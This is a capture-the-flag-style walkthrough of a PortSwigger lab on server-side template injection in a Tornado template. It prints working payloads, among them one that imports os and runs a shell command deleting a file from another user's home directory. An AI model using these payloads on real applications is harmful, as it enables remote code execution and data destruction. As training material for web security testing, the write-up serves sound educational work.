Portswigger Lab Solution — SSTI Code Context | Karthikeyan Nagaraj

Check out the Basics of SSTI in my previous post

Lab Description:

• This lab is vulnerable to server-side template injection due to the way it unsafely uses aTornado template.
• To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.
• You can log in to your own account using the following credentials: wiener:peter

Analysis:

1. Login into the accountwiener:peter and post a comment.

For Example, I’m inserting{{5*5}} as Comment

2. Check outMy Account, we can see that there is a Functionality called thePreferred name which may be vulnerable

3. Intercept the traffic through burp and send it to Repeater — Ctrl+r

4. Let’s try to Inject Tornado’s Template Expressions.

The Below Syntax is used for Tornado

{{someExpression}}

5. Let’s test whether the Expression is Executing or Not by Sending the below payload into the parameterblog-post-author-display

}}{%25+import+os+%25}{{+"+Working"

Reload the Page. Make sure to turn Off the proxy or the Intercept Off

It’s Working : )

Some of the Payloads

{{7*7}} = 49
${7*7} = ${7*7}
{{foobar}} = Error
{{7*’7'}} = 7777777

6. As we know the syntax of Tornado’s Template and we also know that the expressions are Executing, So Let’s use the python code as a payload to deletemorale.txt

}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')

Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )

Thank you for Reading!!

Happy Hunting ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng